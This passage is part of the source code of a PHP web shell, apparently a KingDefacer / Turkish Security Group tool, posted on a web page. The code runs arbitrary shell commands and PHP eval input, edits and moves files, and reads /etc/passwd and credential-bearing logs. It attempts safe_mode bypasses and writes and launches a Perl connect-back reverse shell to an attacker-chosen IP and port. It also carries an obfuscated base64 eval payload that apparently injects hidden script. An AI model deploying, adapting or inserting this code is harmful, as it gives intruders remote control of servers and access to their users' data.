  781. print $size . ' B';
  783. }else {$units = array("kB", "MB", "GB", "TB");
  785. foreach ($units as $unit) {
  787. $size = ($size / 1024);
  789. if ($size < 1024) {break;}}printf ("%.2f",$size);print ' ' . $unit;}}
  791. if($dlink=='ren'&&!isset($_REQUEST['rensub'])){
  793. print "<div><b><center>[<a href=".$PHP_SELF."?scdir=$nscdir> Back </a>]</div>";
  795. print "<center>".$sf;input ("text","ren",$_REQUEST['ren'],20);print " ";
  797. input ("text","renf","New-name",20);print " ";
  799. input ("submit","rensub","Rename" ,"");print $ef;die();}else print "";
  801. if (isset ($_REQUEST['ren'])&&isset($_REQUEST['renf'])){
  803. if (rename($nscdir."/".$_REQUEST['ren'],$nscdir."/".$_REQUEST['renf'])){
  805. print"<center><div><b>[ ". $_REQUEST['ren']." is renamed to " .$sfnt.$_REQUEST['renf'].$efnt." successfully ]</center></div></b>";print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Curr-dir </a>]</div>";die();}else{print "<div><b><center>[ Yeniden Adlandirilamiyor ]</div>";
  807. print "<div><b><center>[<a href=".inclink('dlink', 'rcurrdir')."&scdir=$nscdir> Back </a>]</div>";die();}}function fget($nscdir,$sf,$ef){print "<center>";
  809. print "<div><b>[ Editing <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ] [<a href='javascript:history.back()'> Back </a>] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</b></div>";
  811. print $sf."<textarea cols=157 rows=23 name=edittxt>";
  813. $alltxt= file_get_contents($_REQUEST['edit']);
  815. $nalltxt=htmlspecialchars($alltxt);print $nalltxt;print "</textarea></center>";
  817. if (is_writable($_REQUEST['edit'])){
  819. print "<center><input type=submit value='Save-file' > <input type=reset value='Reset' ></center>".$ef;}else {print "<div><b><center>[ Can't edit
  821. <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> ]</center></b></div><br>";}}function svetxt(){
  823. $fp=fopen ($_REQUEST['edit'],"w");if (is_writable($_REQUEST['edit'])){
  825. $nedittxt=stripslashes($_REQUEST['edittxt']);
  827. fwrite ($fp,$nedittxt);print "<div><b><center>[ <font color=DeepSkyBlue >".basename($_REQUEST['edit'])."</font> Saved !! ]</center></b></div>";fclose($fp);}else {print "<div><b><center>[ Can't save the file !! ]</center></b></div>";}}
  829. if ($dlink=='edit'&&!isset ($_REQUEST['edittxt'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['cmd'])&&!isset($_REQUEST['subqcmnds'])&&!isset($_REQUEST['eval']))
  831. {fget($nscdir,$sf,$ef);}elseif (isset ($_REQUEST['edittxt']))
  833. {svetxt();fget($nscdir,$sf,$ef);}else {print "";}function owgr($file){
  835. $fileowneruid=fileowner($file); $fileownerarray=posix_getpwuid($fileowneruid);
  837. $fileowner=$fileownerarray['name']; $fileg=filegroup($file);
  839. $groupinfo = posix_getgrgid($fileg);$filegg=$groupinfo['name'];
  841. print "$fileowner/$filegg"; }$cpyf=trim($_REQUEST['cpyf']);$ftcpy=trim($_REQUEST['ftcpy']);$cpmv= $cpyf.'/'.$ftcpy;if (isset ($_REQUEST['cpy'])){
  843. if (copy($ftcpy,$cpmv)){$cpmvmess=basename($ftcpy)." copied successfully";}else {$cpmvmess="Can't copy ".basename($ftcpy);}}
  845. elseif(isset($_REQUEST['mve'])){
  847. if (copy($ftcpy,$cpmv)&&unlink ($ftcpy)){$cpmvmess= basename($ftcpy)." moved successfully";}else {$cpmvmess="Can't move ".basename($ftcpy);}
  849. }else {$cpmvmess="COPY / Select a file for copy then paste";}
  851. if (isset ($_REQUEST['safefile'])){
  853. $file=$_REQUEST['safefile'];$tymczas="";if(empty($file)){
  855. if(empty($_GET['file'])){if(empty($_POST['file'])){
  857. print "<center>[ Please choose a file first to read it using copy() ]</center>";
  859. } else {$file=$_POST['file'];}} else {$file=$_GET['file'];}}
  861. $temp=tempnam($tymczas, "cx");if(copy("compress.zlib://".$file, $temp)){
  863. $zrodlo = fopen($temp, "r");$tekst = fread($zrodlo, filesize($temp));
  865. fclose($zrodlo);echo "<center><pre>".$sta.htmlspecialchars($tekst).$eta."</pre></center>";unlink($temp);} else {
  867. print "<FONT COLOR=\"RED\"><CENTER>Sorry, Can't read the selected file !!
  869. </CENTER></FONT><br>";}}if (isset ($_REQUEST['inifile'])){
  871. ini_restore("safe_mode");ini_restore("open_basedir");
  873. print "<center><pre>".$sta;
  875. if (include(htmlspecialchars($_REQUEST['inifile']))){}else {print "Sorry, can't read the selected file !!";}print $eta."</pre></center>";}
  877. if (isset ($_REQUEST['bip'])&&isset ($_REQUEST['bport'])){callback($nscdir,$_REQUEST['bip'],$_REQUEST['bport']);}
  879. function callback($nscdir,$bip,$bport){
  881. if(strstr(php_os,"WIN")){$epath="cmd.exe";}else{$epath="/bin/sh";}
  883. if (is_writable($nscdir)){
  885. $fp=fopen ("back.pl","w");$backpl='back.pl';}
  887. else {$fp=fopen ("/tmp/back.pl","w");$backpl='/tmp/back.pl';}
  889. fwrite ($fp,"use Socket;
  891. \$system='$epath';
  893. \$sys= 'echo \"[ Operating system ][$]\"; echo \"`uname -a`\";
  895. echo \"[ Curr DIR ][$]\"; echo \"`pwd`\";echo;
  897. echo \"[ User perms ][$]\";echo \"`id`\";echo;
  899. echo \"[ Start shell ][$]\";';
  901. if (!\$ARGV[0]) {
  903. exit(1);
  905. }
  907. \$host = \$ARGV[0];
  909. \$port = 80;
  911. if (\$ARGV[1]) {
  913. \$port = \$ARGV[1];
  915. }
  917. \$proto = getprotobyname('tcp') || die('Unknown Protocol\n');
  919. socket(SERVER, PF_INET, SOCK_STREAM, \$proto) || die ('Socket Error\n');
  921. my \$target = inet_aton(\$host);
  923. if (!connect(SERVER, pack 'SnA4x8', 2, \$port, \$target)) {
  925. die('Unable to Connect\n');
  927. }
  929. if (!fork( )) {
  931. open(STDIN,'>&SERVER');
  933. open(STDOUT,'>&SERVER');
  935. open(STDERR,'>&SERVER');
  937. print '\n[ Bk-Code shell by Black-Code :: connect back backdoor by Crash_over_ride ]';
  939. print '\n[ A-S-T team ][ Lezr.com ]\n\n';
  941. system(\$sys);system (\$system);
  943. exit(0); }
  945. ");callfuncs("chmod 777 $backpl");
  947. ob_start();
  949. callfuncs("perl $backpl $bip $bport");
  951. ob_clean();
  953. print "<div><b><center>[ Selected IP is ".$_REQUEST['bip']." and port is ".$_REQUEST['bport']." ]<br>
  955. [ Check your connection now, if failed try changing the port number ]<br>
  957. [ Or Go to a writable dir and then try to connect again ]<br>
  959. [ Return to the Current dir ] [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]
  961. </div><br>";}if (isset($_REQUEST['uback'])){
  963. $uback=$_REQUEST['uback'];$upip=$_REQUEST['upip'];
  965. if ($_REQUEST['upports']=="up80"){callfuncs("perl $uback $upip 80");}
  967. elseif ($_REQUEST['upports']=="up443"){callfuncs("perl $uback $upip 443");}
  969. elseif ($_REQUEST['upports']=="up2121"){callfuncs("perl $uback $upip 2121");}}
  971. delm("# Execute Commands #");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100% height=18%>";
  973. print "<tr><td width=32%><div align=left>";
  975. print $st.$c1."<center><div><b>".$mess3.$ec;
  977. print $c2.$sf."<center>";input("text","cfile","",53);
  979. input("hidden","scdir",$nscdir,0);print "<br>";
  981. input("submit","crefile","Make-it","");
  983. print " ";input("submit","delfile","Delete","");
  985. print "</center>".$ef.$ec.$et."</div></td>";
  987. print "<td><div align=center>".$st.$c1;
  989. print "<center><div><b>Enter the command to execute";print $ec;
  991. print $c2.$sf."<center><div style='margin-top:7px'>";
  993. input("text","cmd","",59);input("hidden","scdir",$nscdir,0);print"<br>";
  995. input("submit","","Execute","");print "</center>".$ef.$ec.$et."</div></td>";
  997. print "<td width=32%><div align=right>";print $st.$c1;
  999. print "<center><div><b>$mess".$ec.$c2.$sf."<center>";
  1001. input("text","dir","",53);input("hidden","scdir",$nscdir,0);print "<br>";
  1003. input("submit","credir","Create-D","");print " ";
  1005. input("submit","deldir","Delete-D","");
  1007. print "</center>".$ef.$ec.$et."</div></td></tr>";
  1009. print "<tr><td width=32%><div align=left>";print $st.$c1;
  1011. print "<center><div><b>Edit/Read File".$ec;print $c2.$sf."<center>";
  1013. input("text","rfile",$nscdir,53);input("hidden","scdir",$nscdir,0);print "<br>";
  1015. input("submit","","Read-Edit","");print "</center>".$ef.$ec.$et."</div></td>";
  1017. print "<td><div align=center>";print $st.$c1;
  1019. print "<center><div><b>View Dir<br>";print $ec.$c2.$sf."<center><div style='margin-top:7px'>"; input("text","scdir",$nscdir,59);print"<br>";
  1021. input("submit","","View","");print " ";
  1023. input("reset","","R00T","");print "</center>".$ef.$ec.$et."</div></td>";
  1025. print "<td><div align=center>";print $st.$c1;
  1027. print "<center><div><b>File size : ".filesize($upfile)." in ( B/Kb )";print $ec.$c2."<form method=post Enctype=multipart/form-data><center>";
  1029. input("file","upfile","",40);input("hidden","scdir",$nscdir,0);
  1031. input("hidden","up",$nscdir,0);
  1033. print"<br>";input("submit","","Upload","");print "</center>".$ef.$ec.$et."</div></td></tr>";
  1035. delm("");print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";print "<tr><td width=50%><div align=left>";
  1037. print $st.$c1."<div><b><center>Execute php code with eval()</div>";
  1039. print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
  1041. print "&nbsp;<textarea cols=73 rows=3 name=eval>";
  1043. if(!isset($evsub)){print "//system('id'); //readfile('/etc/passwd'); //passthru('pwd');";}else{print htmlspecialchars(stripslashes($eval));}
  1045. print "</textarea><br><center>";
  1047. input('submit','evsub','Execute');print " ";
  1049. input('Reset','','Reset');print " ";
  1051. print "</center>".$ec.$ef.$et;
  1053. print "</td><td height=20% width=50%><div align=center>";
  1055. print $st.$c1."<div><b><center>Execute useful commands</div>";
  1057. print $ec.$c2.$sf;input("hidden","scdir",$nscdir,0);
  1059. print "<center><select style='width:60%' name=uscmnds size=1>
  1061. <option value='op0'>Execute quick commands</option>
  1063. <option value='op1'>ls -lia</option>
  1065. <option value='op2'>/etc/passwd</option>
  1067. <option value='op3'>/var/cpanel/accounting.log</option>
  1069. <option value='op4'>/var/named</option>
  1071. <option value='op11'>Perms in curr Dir</option>
  1073. <option value='op12'>Perms in main Dir</option>
  1075. <option value='op5'>Find service.pwd files</option>
  1077. <option value='op6'>Find config files</option>
  1079. <option value='op7'>Find .bash_history files</option>
  1081. <option value='op8'>Read hosts file</option>
  1083. <option value='op9'>Root login</option>
  1085. <option value='op10'>Show opened ports</option>
  1087. <option value='op13'>Show services</option>
  1089. </select> ";print"<input type=submit name=subqcmnds value=Execute style='height:20'> <input type=reset value=Return style='height:20'></center>";
  1091. print $ec.$ef.$et."</td></tr></table>";delm("");
  1093. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  1095. print "<tr><td width=50%><div align=left>";
  1097. print $st.$c1."<div><b><center>".$cpmvmess."</div>";
  1099. print $ec.$c2.$sf."&nbsp;";input("text","ftcpy","File-name",15);
  1101. print "<b><font face=tahoma size=2>&nbsp;To </b>";
  1103. input("text","cpyf",$nscdir,45);input("hidden","scdir",$nscdir,0);print " ";
  1105. input("submit","cpy","Copy","");print " ";input("submit","mve","Move","");
  1107. print "</center>".$ec.$ef.$et;
  1109. print "</td><td height=20% width=50%><div align=right>";
  1111. print $st.$c1."<div><b><center>Important commands</div>";
  1113. print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
  1115. print "<select style='width:22%' name=ustools size=1>
  1117. <option value='t1'>Wget</option><option value='t2'>Curl</option>
  1119. <option value='t3'>Lynx</option><option value='t9'>Get</option>
  1121. <option value='t4'>Unzip</option><option value='t5'>Tar</option>
  1123. <option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
  1125. <option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
  1127. print "</td></tr></table>";delm(": Safe mode bypass :");
  1129. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  1131. print "<tr><td width=50%><div align=left>";
  1133. print $st.$c1."<div><b><center>Using copy() function</div>";
  1135. print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
  1137. input("hidden","scdir",$nscdir,0);print " ";
  1139. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  1141. print "</td><td height=20% width=50%><div align=right>";
  1143. print $st.$c1."<div><b><center>Using ini_restore() function</div>";
  1145. print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
  1147. input("hidden","scdir",$nscdir,0);print " ";
  1149. input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
  1151. print "</td></tr></table>";delm("# Backdoor Connection #");
  1153. print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
  1155. print "<tr><td width=50%><div align=left>";
  1157. print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
  1159. print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
  1161. input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
  1163. input("submit","","Connect","");print " ";input("reset","","Reset","");
  1165. print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1><option value='up80'>80</option><option value='up443'>443</option><option value='up2121'>2121</option></select>";print " ";input("text","uback","back.pl",23);print " ";input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
  1167. print "</center>".$ec.$ef.$et;print "</td></tr></table>";
  1169. print"<center>Copyright is reserved to KingDefacer<br>[ By Turkish Security GROUP Go to : <a target='_blank' href='http://alturks.com'>http://alturks.com/</a> ]";
  1171. print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
  1173. print"</font></td></tr></table>";
  1175. ?>
comments powered by Disqus